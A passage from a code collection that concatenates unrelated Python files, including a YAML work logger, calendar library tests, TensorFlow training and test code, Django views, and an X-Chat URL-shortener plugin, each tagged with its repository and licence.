yaml_data_final = yaml_printer(yaml_raw_data)
return yaml_data_final
# convert YAML data in dict to YAML writable format.
def yaml_printer(yaml_data_dict):
yaml_data_final = yaml.dump(yaml_data_dict, default_flow_style=False)
return yaml_data_final
# The first entry in any YAML file.
def first_log_entry(now):
#yaml_data_dict = {now[1]:{'LOG00':{'TIME':'time', 'TYPE':'type', 'ENTRY':'entry'}}}
yaml_data_dict = {now[1]:{'LOG0':{}}}
return yaml_data_dict
# Common function to append YAML dict.
def x_log_entry(args, now, yaml_data_dict):
#{log_today:{log_id:{'TIME':log_time, 'TYPE':log_type, 'ENTRY':'log_entry'}}}
log_today = str(now[1])
log_id = log_id_creator(yaml_data_dict, now)
log_time = int(now[0])
log_type = args[1]
log_entry = str(' '.join(args[2:]))
data_to_append = {'TIME':log_time,'TYPE':log_type,'ENTRY':log_entry}
yaml_data_dict[log_today][log_id] = data_to_append
yaml_data_final = yaml_data_dict
return yaml_data_final
# Get the dictonary to modify
def log_dict_to_modify(yaml_raw_data, date_key):
yaml_data_dict = yaml_raw_data[date_key]
return yaml_data_dict
# info and todo cmds function
def info_todo_cmds(args, cmy_dir, now):
yaml_file = yaml_fp_creator(cmy_dir, now)
yaml_raw_data = read_yaml_file(yaml_file)
yaml_data_dict_modified = x_log_entry(args, now, yaml_raw_data)
yaml_data_final = yaml_printer(yaml_data_dict_modified)
write_yaml_file(yaml_file, yaml_data_final)
print "Saved.\nContinue your work buddy !!"
# Genereate LOG* to append.
def log_id_creator(yaml_raw_data, now):
today = now[1]
# Sorting LOG* keys.
sorted_log_id_keys = sorted(yaml_raw_data[today].keys())
# Incrementing LOGID. LOG0 to LOG1
new_log_id_int = int(sorted_log_id_keys[-1].replace('LOG','')) + 1
new_log_id = 'LOG'+str(new_log_id_int)
return new_log_id
# Create "today" key & LOG0, if it is not present in the file.
def check_for_today_key(cmy_dir, now):
yaml_file = yaml_fp_creator(cmy_dir, now)
yaml_raw_data = read_yaml_file(yaml_file)
today = now[1]
if not yaml_raw_data.has_key(today):
data_to_append = first_log_entry(now)
yaml_raw_data[today] = data_to_append[today]
yaml_data_dict_modified = yaml_raw_data
yaml_data_final = yaml_printer(yaml_data_dict_modified)
write_yaml_file(yaml_file, yaml_data_final)
def read_conf():
#reads the config file located in the home directory.
cmy_conf = read_yaml_file(os.path.expanduser('~') + "/.config/cmy/cmy.conf")
#check empty dictionary
if (not bool(cmy_conf)):
print "cmy.conf is empty."
sys.exit()
cmy_dir = os.path.expanduser(cmy_conf['cmy_dir'])
if ("cmy_dir" not in locals() or cmy_dir == ""):
print "cmy_dir is empty or not defined. set a location for your logs."
sys.exit()
return cmy_dir
def check_conf_file():
#checks if the config file exists. If doesn't exist, create a new config file.
#<homedir>/.config/cmy/ is the default location of cmy.conf per user.
#Returns True if the config file exists or successfully created newly. Returns false otherwise.
confdirpath = os.path.expanduser("~/.config/cmy/")
conffilepath = confdirpath + "cmy.conf"
fd = Path(conffilepath)
if fd.is_file():
#File exists
return True
elif fd.is_dir():
#Directory with same name exist
return False
else:
#cmy.conf doesn't exist, create a new one.
#create directory
if not os.path.exists(confdirpath):
os.makedirs(confdirpath)
confdata = "# Configuration file for cmy.py\n# The logs are saved in ~/cmy_logs directory by default.\ncmy_dir: ~/cmy_logs/\n"
#open(conffilepath, "wt")
#open(conffilepath, "a")
with open(conffilepath, "w") as f:
f.write(confdata)
return True
def starting_up():
if not check_conf_file():
print "Config file doesn't exist. Problem creating the new config file."
sys.exit()
cmy_dir = read_conf()
now = ttmy()
args = sys.argv
create_yaml_file(cmy_dir, now)
check_for_today_key(cmy_dir, now)
return args, now, cmy_dir
def start_here():
args, now, cmy_dir = starting_up()
if len(args) == 1:
print "Usage: cmy.py <options>\nSupported Options: show|info|todo"
elif args[1] == "list":
print list_cmd(args, cmy_dir, now)
elif args[1] == "info":
info_todo_cmds(args, cmy_dir, now)
elif args[1] == "todo":
info_todo_cmds(args, cmy_dir, now)
else:
print "Invalid Option"
if __name__ == '__main__':
start_here()
| anilv4/cmy | cmy/cmy.py | Python | gpl-3.0 | 6,870 |
"""
returns tsv of word frequencies in revision comments
Usage:
revision_comment_word_extractor (-h|--help)
revision_comment_word_extractor <input> <output>
[--debug]
[--verbose]
Options:
-h, --help This help message is printed
<input> Path to file to process.
<output> Where revisions results
will be written
--debug Print debug logging to stderr
--verbose Print dots and stuff to stderr
"""
import docopt
import sys
import logging
import operator
from collections import defaultdict
import re
import mysqltsv
REMOVED_COMMENT_RE = re.compile(r'^\/\*.*.\*\/')
PUNCTUATION_RE = re.compile(r'\:|\(|\)|\.|\,|\-')
logger = logging.getLogger(__name__)
def main(argv=None):
args = docopt.docopt(__doc__)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
input_file = mysqltsv.Reader(open(args['<input>'], "r"), headers=False,
types=[str, int, str, str, int])
output_file = mysqltsv.Writer(open(args['<output>'], "w"))
verbose = args['--verbose']
run(input_file, output_file, verbose)
def run(input_file, output_file, verbose):
word_count = defaultdict(int)
for i, line in enumerate(input_file):
comment = line[3]
if comment != None:
comment = re.sub(REMOVED_COMMENT_RE, "", comment)
for word in comment.split(" "):
normalized_word = re.sub(PUNCTUATION_RE, "", word).lower()
word_count[normalized_word] += 1
if verbose and i % 10000 == 0 and i != 0:
sys.stderr.write("Revisions processed: {0}\n".format(i))
sys.stderr.flush()
sorted_word_count = sorted(word_count.items(), key=operator.itemgetter(1),
reverse=True)
sum_of_word_counts = 0
for i, entry in enumerate(sorted_word_count):
output_file.write([entry[0], entry[1]])
sum_of_word_counts += entry[1]
if verbose and i % 10000 == 0 and i != 0:
sys.stderr.write("Words written: {0}\n".format(i))
sys.stderr.flush()
print("Total word count: {0}".format(sum_of_word_counts))
if verbose:
sys.stderr.write("Completed writing out result file\n")
sys.stderr.flush()
main()
| hall1467/wikidata_usage_tracking | python_analysis_scripts/revision_comment_word_extractor.py | Python | mit | 2,427 |
# -*- coding: utf-8 -*-
"""
A file compress utility module. You can easily programmatically add files
and directorys to zip archives. And compress arbitrary binary content.
- :func:`zip_a_folder`: add folder to archive.
- :func:`zip_everything_in_a_folder`: add everything in a folder to archive.
- :func:`zip_many_files`: Add many files to a zip archive.
- :func:`write_gzip`: Write binary content to gzip file.
- :func:`read_gzip`: Read binary content from gzip file.
**中文文档**
提供了若干个文件和数据压缩的快捷函数。
- :func:`zip_a_folder`: 将目录添加到压缩包。
- :func:`zip_everything_in_a_folder`: 将目录内的所有文件添加到压缩包。
- :func:`zip_many_files`: 将多个文件添加到压缩包。
- :func:`write_gzip`: 将二进制数据写入文件, 例如python pickle, bytes string。
- :func:`read_gzip`: 读取解压后的二进制数据内容。
注: python中zipfile包自带的ZipFile方法的用法如下:
基本用法::
with ZipFile("filename.zip", "w") as f:
f.write(path)
其中path是文件路径。 如果path是文件夹, 并不会将文件夹内所有的文件添加到压缩包中。
相对路径压缩:
比如你有一个路径 ``C:\download\readme.txt``, 如果当前路径是 ``C:\``,
而此时你将 ``readme.txt`` 添加到压缩包时则是在压缩包内添加一个: ``download\readme.txt``,
如果当前路径是 ``C:\download\``, 则在压缩包内添加的路径则是: ``readme.txt``
"""
from __future__ import print_function
import os
from zipfile import ZipFile
def zip_a_folder(src, dst):
"""Add a folder and everything inside to zip archive.
Example::
|---paper
|--- algorithm.pdf
|--- images
|--- 1.jpg
zip_a_folder("paper", "paper.zip")
paper.zip
|---paper
|--- algorithm.pdf
|--- images
|--- 1.jpg
**中文文档**
将整个文件夹添加到压缩包, 包括根目录本身。
"""
if os.path.exists(dst):
print("destination '%s' already exist." % dst)
return
src, dst = os.path.abspath(src), os.path.abspath(dst)
cwd = os.getcwd()
todo = list()
dirname, basename = os.path.split(src)
os.chdir(dirname)
for dirname, _, fnamelist in os.walk(basename):
for fname in fnamelist:
newname = os.path.join(dirname, fname)
todo.append(newname)
with ZipFile(dst, "w") as f:
for newname in todo:
f.write(newname)
os.chdir(cwd)
def zip_everything_in_a_folder(src, dst):
"""Add everything in a folder except the root folder it self to zip archive.
Example::
|---paper
|--- algorithm.pdf
|--- images
|--- 1.jpg
zip_everything_in_folder("paper", "paper.zip")
paper.zip
|--- algorithm.pdf
|--- images
|--- 1.jpg
**中文文档**
将目录内部的所有文件添加到压缩包, 不包括根目录本身。
"""
if os.path.exists(dst):
print("destination '%s' already exist." % dst)
return
src, dst = os.path.abspath(src), os.path.abspath(dst)
cwd = os.getcwd()
todo = list()
os.chdir(src)
for dirname, _, fnamelist in os.walk(os.getcwd()):
for fname in fnamelist:
newname = os.path.relpath(os.path.join(dirname, fname), src)
todo.append(newname)
with ZipFile(dst, "w") as f:
for newname in todo:
f.write(newname)
os.chdir(cwd)
def zip_many_files(list_of_abspath, dst):
"""Add many files to a zip archive.
**中文文档**
将一系列的文件压缩到一个压缩包中, 若有重复的文件名, 在zip中保留所有的副本。
"""
if os.path.exists(dst):
print("destination '%s' already exist." % dst)
return
base_dir = os.getcwd()
with ZipFile(dst, "w") as f:
for abspath in list_of_abspath:
dirname, basename = os.path.split(abspath)
os.chdir(dirname)
f.write(basename)
os.chdir(base_dir)
| MacHu-GWU/single_file_module-project | sfm/winzip.py | Python | mit | 4,194 |
class Solution:
def twoCitySchedCost(self, costs):
costs = sorted(costs, key=lambda x:x[0]-x[1])
ans = 0
for i in range(len(costs)):
if i < len(costs)//2:
ans += costs[i][0]
else:
ans += costs[i][1]
return ans
print(Solution().twoCitySchedCost([[10,20],[30,200],[400,50],[30,20]]))
| zuun77/givemegoogletshirts | leetcode/python/1029_two-city-scheduling.py | Python | apache-2.0 | 374 |
#!/usr/bin/env python3
from rnnlm_ops import RnnlmOp, run_epoch
from dataset import Datasets
from config import Config
import os
import tensorflow as tf
class Train(RnnlmOp):
def __init__(self, config, params):
super(Train, self).__init__(config, params)
self.io.check_dir(params.data_path)
assert(bool(params.continue_training) == params.continue_training)
self.data_path = params.data_path
self.continue_training = params.continue_training
self.loss_fct = params.loss_fct
if not self.continue_training:
self.config.epoch, self.config.step = 1,0
self._load_data()
self.build_graph()
def _load_data(self):
self.data = Datasets(self.data_path,
training=True,
word_to_id=None,
batch_size=self.config.batch_size,
num_steps=self.config.num_steps)
self.io.save_w2id(self.data.word_to_id)
def _build_graph(self):
config = self.config
config.fast_test = False
eval_config = Config(clone=config)
eval_config.batch_size = 1
initializer = self.model_initializer
with tf.name_scope("Train"):
with tf.variable_scope("Model", reuse=False, initializer=initializer):
self.train_model = self.Model(config=config, is_training=True, loss_fct=self.loss_fct)
tf.summary.scalar("Training Loss", self.train_model.cost)
tf.summary.scalar("Learning Rate", self.train_model.lr)
with tf.name_scope("Valid"):
with tf.variable_scope("Model", reuse=True, initializer=initializer):
self.validation_model = self.Model(config=config, is_training=False, loss_fct="softmax")
tf.summary.scalar("Validation Loss", self.validation_model.cost)
with tf.name_scope("Test"):
with tf.variable_scope("Model", reuse=True, initializer=initializer):
self.test_model = self.Model(config=eval_config, is_training=False)
def _run(self):
m, mvalid, mtest = self.train_model, self.validation_model, self.test_model
config = self.config
data = self.data
params = self.params
init_op = tf.initialize_all_variables()
with tf.Session() as session:
session.run(init_op)
print("Starting training from epoch %d using %s loss" % (config.epoch, m.loss_fct))
while config.epoch <= config.max_max_epoch:
i = config.epoch
lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)
m.assign_lr(session, config.learning_rate * lr_decay)
print("\nEpoch: %d Learning rate: %.3f" % (i, session.run(m.lr)))
train_perplexity = run_epoch(session, m,
data.train,
eval_op=m.train_op,
verbose=True,
opIO=self.io,
log_rate=params.log_rate,
save_rate=params.save_rate)
print("Epoch: %d Train Perplexity: %.3f" % (i, train_perplexity))
print("Validation using %s loss" % mvalid.loss_fct)
valid_perplexity = run_epoch(session, mvalid, data.valid)
print("Epoch: %d Valid Perplexity: %.3f" % (i, valid_perplexity))
config.step = 0
config.epoch += 1
config.save()
self.io.save_checkpoint(session, "ep_%d.ckpt" % config.epoch)
if __name__ == "__main__":
import flags
train = Train(flags.config, flags.FLAGS)
train()
| pltrdy/tf_rnnlm | train.py | Python | apache-2.0 | 3,381 |
# coding=utf-8
from adbook.orm.entity import Entity
from adbook.orm.types.collection_ref import CollectionRef
class Group(Entity):
"""
Group entity
"""
def __init__(self, name=""):
super().__init__()
self.name = name
self.persons = CollectionRef("persons", self, Group._manager, "groups")
def __str__(self):
return "Group: {0}".format(self.name)
| avatar29A/adbook | adbook/orm/entities/groups.py | Python | mit | 406 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for PrecisionOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class InTopKTest(test.TestCase):
def _validateInTopK(self, predictions, target, k, expected):
np_ans = np.array(expected)
with self.test_session():
precision = nn_ops.in_top_k(predictions, target, k)
out = precision.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, precision)
def testInTop1(self):
predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
target = [3, 1]
self._validateInTopK(predictions, target, 1, [True, False])
def testInTop2(self):
predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
target = [0, 2]
self._validateInTopK(predictions, target, 2, [False, True])
def testInTop2Tie(self):
# Class 2 and 3 tie for 2nd, so both are considered in top 2.
predictions = [[0.1, 0.3, 0.2, 0.2], [0.1, 0.3, 0.2, 0.2]]
target = [2, 3]
self._validateInTopK(predictions, target, 2, [True, True])
def testInTop2_int64Target(self):
predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
target = np.asarray([0, 2]).astype(np.int64)
self._validateInTopK(predictions, target, 2, [False, True])
def testInTopNan(self):
predictions = [[0.1, float("nan"), 0.2, 0.4], [0.1, 0.2, 0.3, float("inf")]]
target = [0, 2]
self._validateInTopK(predictions, target, 2, [False, False])
def testBadTarget(self):
predictions = [[0.1, 0.3, 0.2, 0.4], [0.1, 0.2, 0.3, 0.4]]
target = [0, 80000]
with self.test_session():
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"target.*out of range"):
nn_ops.in_top_k(predictions, target, 2).eval()
if __name__ == "__main__":
test.main()
| npuichigo/ttsflow | third_party/tensorflow/tensorflow/python/kernel_tests/in_topk_op_test.py | Python | apache-2.0 | 2,682 |
import unittest
import freezegun
import ocal
import time
import os
class ocaltest(unittest.TestCase):
def assertYMD(self, o, cal, year, mon, day, dow, msg):
self.assertEqual(o.calendar, cal,
"{} showed the wrong calendar".format(msg))
self.assertEqual(o.year, year, "{} in year {} gave year {}"
.format(msg, year, o.year))
self.assertEqual(o.month, mon, "{} in month {} gave month {}"
.format(msg, mon, o.month))
self.assertEqual(o.day, day, "{} in day {} gave day {}"
.format(msg, day, o.day))
self.assertEqual(o.dow, dow, "{} in dow {} gave dow {}"
.format(msg, dow, o.dow))
def test_ocal_init(self):
o = ocal.ocal(year=1995, month=9, day=27, calendar=ocal.GREGORIAN)
self.assertEqual(o.date, 49987,
"init with gregorian didn't return correct mjd date")
self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27,
3, "init with given gregorian")
self.assertEqual(type(o.date), int, "o.date is {}, not int"
.format(type(o.date)))
o = ocal.ocal(year=1995, month=9, day=27)
self.assertEqual(o.date, 49987,
"init default:gregorian returned wrong mjd date")
self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27, 3,
"init with default gregorian")
o = ocal.ocal(year=1995, month=9, day=14, calendar=ocal.JULIAN)
self.assertEqual(o.date, 49987,
"init with julian didn't return correct mjd date")
self.assertYMD(o, ocal.JULIAN, 1995, 9, 14, 3,
"init with given julian")
self.assertEqual(type(o.date), int, "o.date is {}, not int"
.format(type(o.date)))
try:
o = ocal.ocal(year=1995, month=9, day=14, calendar=47)
except ValueError as e:
self.assertEqual(e.args[0], "Unknown calendar:47", "Invalid error")
except BaseException as e:
self.fail(
"init with invalid calendar raised unexpected exception:{}"
.format(repr(e)))
else:
self.fail("init with invalid calendar failed to raise exception")
o = ocal.ocal(date=49987)
self.assertEqual(o.date, 49987, "init with date didn't return itself!")
self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27, 3, "init with date")
try:
o = ocal.ocal(month=9, day=27, calendar=ocal.GREGORIAN)
except KeyError:
pass
except e:
self.fail("Raised unexpected exception (with missing year):", e)
else:
self.fail("Missing exception when year missing")
try:
o = ocal.ocal(year=1995, day=27, calendar=ocal.GREGORIAN)
except KeyError:
pass
except e:
self.fail("Raised unexpected exception (with missing month):", e)
else:
self.fail("Missing exception when month missing")
try:
o = ocal.ocal(year=1995, month=9, calendar=ocal.ocal.gregorian)
except KeyError:
pass
except e:
self.fail("Raised unexpected exception (with missing day):", e)
else:
self.fail("Missing exception when day missing")
def test_ocal_gregorian(self):
o = ocal.gregorian(1995, 9, 27)
self.assertEqual(
o.date, 49987, "gregorian init didn't return correct mjd date")
self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27,
3, "init with gregorian function")
def test_ocal_julian(self):
o = ocal.julian(1995, 9, 14)
self.assertEqual(
o.date, 49987, "julian init didn't return correct mjd date")
self.assertYMD(o, ocal.JULIAN, 1995, 9, 14,
3, "init with julian function")
def test_ocal_mjdate(self):
o = ocal.ocal.mj_date(49987)
self.assertEqual(
o.date, 49987, "mj_date init didn't return correct mjd date")
self.assertYMD(o, ocal.GREGORIAN, 1995, 9, 27, 3, "init with mj_date")
def test_ocal_get_date(self):
o = ocal.ocal.mj_date(49987)
self.assertEqual(o.get_date(), 49987,
"get_date didn't return correct mjd date")
def test_ocal_get_ymd_g(self):
o = ocal.ocal.mj_date(49987)
self.assertEqual(o.get_ymd_g(), (1995, 9, 27),
"get_ymd_g() didn't return expected year,month,day")
def test_ocal_get_ymd_j(self):
o = ocal.ocal.mj_date(49987)
self.assertEqual(o.get_ymd_j(), (1995, 9, 14),
"get_ymd_j() didn't return expected year,month,day")
def test_ocal_get_dow(self):
o = ocal.ocal.mj_date(49987)
self.assertEqual(
o.get_dow(), 3, "get_dow didn't return expected day of week")
# modifying methods
def test_ocal_add_days(self):
o = ocal.ocal.mj_date(100)
self.assertEqual(o.get_date(), 100,
"add_days test didn't start with 100")
o.add_days(10)
self.assertEqual(o.get_date(), 110, "add_days failed adding 10")
o.add_days(-200)
self.assertEqual(o.get_date(), -90, "add_days failed subtracting 200")
def test_ocal_next_dow(self):
o = ocal.ocal.mj_date(49987)
o.next_dow(1, 0)
self.assertEqual(o.get_ymd_g(), (1995, 10, 1),
"first sunday after 9/27/1995 failed")
self.assertEqual(
o.dow, 0, "went to dow 0, but made it to {} instead".format(o.dow))
o = ocal.ocal.gregorian(2014, 6, 1)
o.next_dow(1, 0) # advance to Sunday, but 6/1/2014 IS a Sunday
self.assertEqual(o.get_ymd_g(), (2014, 6, 8),
"Advancing to same day failed")
o = ocal.ocal.gregorian(2014, 6, 1)
o.next_dow(-1, 0) # advance to last Sunday in May
self.assertEqual(o.get_ymd_g(), (2014, 5, 25),
"Advancing to last day in prev month failed")
o.next_dow(-2, 4) # advance back a couple weeks
self.assertEqual(o.get_ymd_g(), (2014, 5, 15),
"Advancing back 2 weeks failed")
o.next_dow(2, 4) # advance forward a couple weeks
self.assertEqual(o.get_ymd_g(), (2014, 5, 29),
"Advancing forward 2 weeks failed")
try:
o.next_dow(0, 3) # 0: ValueError
except ValueError:
pass
except BaseException as e:
self.fail("Unexpected exception thrown:", e)
else:
self.fail("No exception thrown. Expected ValueError")
o = ocal.ocal.gregorian(2014, 6, 2)
o.next_dow(-1, 0)
self.assertEqual(o.get_ymd_g(), (2014, 6, 1),
"Going back to yesterday failed")
o = ocal.ocal.gregorian(2014, 6, 1)
o.next_dow(1, 0, offset=-1)
self.assertEqual(o.get_ymd_g(), (2014, 6, 1),
'"Advancing" to self (via offset=-1) failed"')
o = ocal.ocal.gregorian(2014, 6, 1)
o.next_dow(-1, 0, offset=1)
self.assertEqual(o.get_ymd_g(), (2014, 6, 1),
'"Advancing" to self (via offset=1) failed"')
def test_ocal_repr(self):
o = ocal.julian(2015, 12, 25)
rp = repr(o)
exp = "ocal.ocal.julian(2015, 12, 25)"
self.assertEqual(rp, exp,
"repr failure. Expected '{}', got '{}'"
.format(exp, rp))
o.calendar = ocal.GREGORIAN
rp = repr(o)
exp = "ocal.ocal.gregorian(2016, 1, 7)"
self.assertEqual(rp, exp,
"repr failure. Expected '{}', got '{}'"
.format(exp, rp))
def test__add(self):
n = ocal.julian(2015, 12, 25)
th = n + 12
self.assertYMD(th, ocal.JULIAN, 2016, 1, 6,
2, "__add from Nativity 2015")
self.assertEqual(th.get_ymd_j(), (2016, 1, 6),
"__add__ failed. Nativity+12 is {}"
.format(th.get_ymd_j()))
def test__sub(self):
th = ocal.julian(2016, 1, 6)
n = th - 12
self.assertYMD(n, ocal.JULIAN, 2015, 12, 25,
4, "__sub__from Theophany (")
self.assertEqual(n.get_ymd_j(), (2015, 12, 25),
"__sub__ failed. Theophany-12 is {}"
.format(n.get_ymd_j()))
self.assertEqual(th - n, 12, "relative difference failed."
"Difference between Theophany and Nativity is {} days"
.format(th - n))
def test__iadd(self):
th = ocal.julian(2016, 1, 6)
svth = th
th += 3
self.assertEqual(id(th), id(svth), "+= changed th object")
nth = ocal.julian(2016, 1, 9)
self.assertEqual(th, nth, "+= {} not the 9th".format(th))
def test__isub(self):
th = ocal.julian(2016, 1, 6)
svth = th
th -= 3
self.assertEqual(id(th), id(svth), "-= changed th object")
nth = ocal.julian(2016, 1, 3)
self.assertEqual(th, nth, "-= {} not the 3rd".format(th))
def test__cmp(self):
d1 = ocal.gregorian(2016, 1, 5)
d2 = ocal.gregorian(2016, 1, 6)
self.assertLess(d1, d2, "failure: {} not less than {}".format(d1, d2))
d1 += 1
self.assertEqual(d1, d2, "failure: {} not equal to {}".format(d1, d2))
d1 += 1
self.assertGreater(
d1, d2, "failure: {} not greater than {}".format(d1, d2))
class ocalpascha(unittest.TestCase):
def test_pascha(self):
ydates = (
(2014, 56767),
(2001, 52014),
(2000, 51664),
(1960, 37041),
(1958, 36306),
(1977, 43243)
)
for yd in ydates:
o = ocal.pascha(yd[0])
self.assertEqual(
o.dow, 0, "Pascha for {} not on Sunday according to o.dow")
self.assertEqual(
o.get_dow(), 0, "Pascha for year {} not on Sunday!")
self.assertEqual(o.get_date(), yd[1],
"Pascha failed for year {} ({} != {})"
.format(yd[0], o.get_date(), yd[1]))
class test_time_today(unittest.TestCase):
def setUp(self):
self.sv = time.tzname, time.timezone, time.altzone
try:
self.tzsv = os.environ['TZ']
except KeyError:
self.tzsv = None
os.environ['TZ'] = 'UTC+0'
time.tzset()
self.assertEqual(time.timezone, 0)
def tearDown(self):
time.tzname, time.timezone, time.altzone = self.sv
if self.tzsv is None:
del os.environ['TZ']
else:
os.environ['TZ'] = self.tzsv
def daytest(self, g, (y, m, d)):
self.assertEqual(g.calendar, ocal.GREGORIAN, "wrong calendar")
self.assertEqual(g.year, y, "returned {} not {}".format(g.year, y))
self.assertEqual(g.month, m, "returned {} not {}".format(g.month, m))
self.assertEqual(g.day, d, "returned {} not {}".format(g.day, d))
@freezegun.freeze_time('2010-02-18 10:59:45')
def test_today_1(self):
"Test various permutations of today, using freeze_time"
# first, no midnight
g = ocal.today()
self.daytest(g, (2010, 2, 18))
g = ocal.today(midnight=11)
self.daytest(g, (2010, 2, 18))
g = ocal.today(midnight=10)
self.daytest(g, (2010, 2, 19))
@freezegun.freeze_time('2013-07-01 18:00:01')
def test_today_2(self):
# first, no midnight
g = ocal.today()
self.daytest(g, (2013, 7, 1))
g = ocal.today(midnight=19)
self.daytest(g, (2013, 7, 1))
g = ocal.today(midnight=18)
self.daytest(g, (2013, 7, 2))
if __name__ == "__main__":
unittest.main()
| mlv/ocal | test_ocal.py | Python | mit | 12,174 |
from django.shortcuts import render, redirect, get_object_or_404
from blogEngine.models import blogPost, blogSlug
def postList(request, pk):
pass
##Both of these just deal with url management, and keeping url's human readable.
def postView(request, pk=None, slug=None):
postInstance = get_object_or_404(blogPost, pk=pk)
#redirects you to the proper name, if you're not using it.
if postInstance.mainSlug and (not slug or postInstance.mainSlug.slug != slug):
return redirect(postView, pk=pk, slug=postInstance.mainSlug.slug)
print(postInstance.title)
context={
'post':postInstance,
}
return render(request, "blog/post.html", context)
def getUrlFromSlug(request, slug):
postSlug = get_object_or_404(blogSlug, slug=slug)
return redirect(postView, postSlug.parent.pk)
| traverseda/personalSite | blogEngine/views.py | Python | unlicense | 822 |
"""
uh.cx
X-Chat Version
@homepage: http://uh.cx
@copyright: Copyright (C) 2015 J. Boehm
"""
__module_name__ = "uh.cx"
__module_version__ = "0.2"
__module_description__ = "Make a shortened URL with uh.cx and post it to a channel or user."
__module_author__ = "uh.cx (J. Boehm)"
import urllib
import traceback
import json
import urllib2
import xchat
class Manager:
_url = 'http://uh.cx/api/create'
def __init__(self):
pass
class Link:
def __init__(self):
pass
url_original = ''
url_redirect = ''
url_preview = ''
qr_redirect = ''
qr_preview = ''
class InvalidResponseException(Exception):
pass
class CouldNotCreateLinkException(Exception):
pass
class ResponseValidator:
_keys = ['QrDirect', 'QrPreview', 'UrlDirect', 'UrlOriginal', 'UrlPreview']
def __init__(self):
pass
@staticmethod
def check(response):
for key in Manager.ResponseValidator._keys:
if key not in response:
return False
return True
@staticmethod
def create(url):
try:
request = urllib2.Request(Manager._url, urllib.urlencode({'url': url}))
response = urllib2.urlopen(request)
response_data = json.loads(response.read())
except urllib2.HTTPError:
raise Manager.InvalidResponseException()
if not Manager.ResponseValidator.check(response_data):
raise Manager.InvalidResponseException()
link = Manager.Link()
link.qr_preview = response_data['QrPreview']
link.qr_redirect = response_data['QrDirect']
link.url_original = response_data['UrlOriginal']
link.url_preview = response_data['UrlPreview']
link.url_redirect = response_data['UrlDirect']
return link
def on_uhcx(word, word_eol, userdata):
if len(word) < 2:
print 'Usage: /uhcx http://your.long.url/'
else:
try:
url = word[1]
o = Manager.create(url)
xchat.command('SAY ' + o.url_redirect)
except Manager.InvalidResponseException:
print 'An error occured. Did you try to shorten an invalid URL?'
except:
print traceback.print_exc()
print ''
print 'An unknown error occurred! I cannot create your url. Sorry!'
return xchat.EAT_ALL
xchat.hook_command('uhcx', on_uhcx, help='/uhcx http://your.long.url/')
| jeboehm/uhcx-xchat | uhcx_xchat.py | Python | gpl-2.0 | 2,529 |
#!/usr/bin/env python
import Genscan
import GFF
meta, data, proteins = Genscan.load('genscan.txt')
offset = 16000000
reference = 'scaffold_42'
gffSource = 'genscan'
gffClass = 'Genscan'
featureType = 'gene'
subfeatureType = 'exon'
for gene in data:
name = gene[0]['gene.exon'].split('.')[0]
output = []
extrema = []
for exon in gene:
if exon['type'] in ['Init','Intr','Term','Sngl']:
output.append(GFF.output(
reference = reference,
source = gffSource,
type = subfeatureType,
start = exon['start']+offset-1,
end = exon['end']+offset-1,
strand = exon['strand'],
score = exon['score'],
group = '%s %s' % (gffClass, name)
))
extrema.append(exon['start'])
extrema.append(exon['end'])
output.insert(0, GFF.output(
reference = 'scaffold_42',
source = gffSource,
type = featureType,
start = min(extrema)+offset-1,
end = max(extrema)+offset-1,
strand = gene[0]['strand'],
group = '%s %s' % (gffClass, name)
))
for out in output:
print out
| PapenfussLab/Mungo | snippets/genscan2gff.py | Python | artistic-2.0 | 1,215 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4
from django.conf import settings
from django.db.models import Sum, Count, Avg
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.models import User
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.contrib import messages
from ..accounts.models import UserProfile
from ..checkin.models import Freggie, FreggieGoal, NonVeg
from itertools import chain
from operator import attrgetter, itemgetter
from django.forms.models import model_to_dict
from datetime import datetime
from utils import build_foodlog_xls
@login_required
def download_xls(request):
p=get_object_or_404(UserProfile, user=request.user)
nonvegs=NonVeg.objects.filter(user=request.user)
combolist=[]
for i in nonvegs:
row={'mydatetime': i.evdt, 'item':i.nonveg, 'quantity': i.quantity}
combolist.append(row)
freggies=Freggie.objects.filter(user=request.user)
for i in freggies:
row={'mydatetime': i.evdt, 'item':i.freggie, 'quantity': i.quantity}
combolist.append(row)
combolist=sorted(combolist,key=itemgetter('mydatetime'), reverse=True)
filename = datetime.now().strftime('%m-%d-%Y_%H:%M:%S') + '.xls'
response = HttpResponse(mimetype="application/vnd.ms-excel")
response['Content-Disposition'] = 'attachment; filename=' + filename
excelwb = build_foodlog_xls(combolist)
excelwb.save(response)
return response
@login_required
def profile(request):
p=get_object_or_404(UserProfile, user=request.user)
nonvegs=NonVeg.objects.filter(user=request.user)
freggies=Freggie.objects.filter(user=request.user)
combolist = sorted(chain(nonvegs, freggies), key=attrgetter('evdt'),
reverse=True)
agg = Freggie.objects.values('freggie').annotate(Sum('quantity')).order_by()
agg = Freggie.objects.filter(user=request.user).values('evdate').annotate(freggie=Sum('quantity')).order_by()
goallist=[]
for a in agg:
goal=FreggieGoal.objects.get(user=request.user, evdate=a['evdate'])
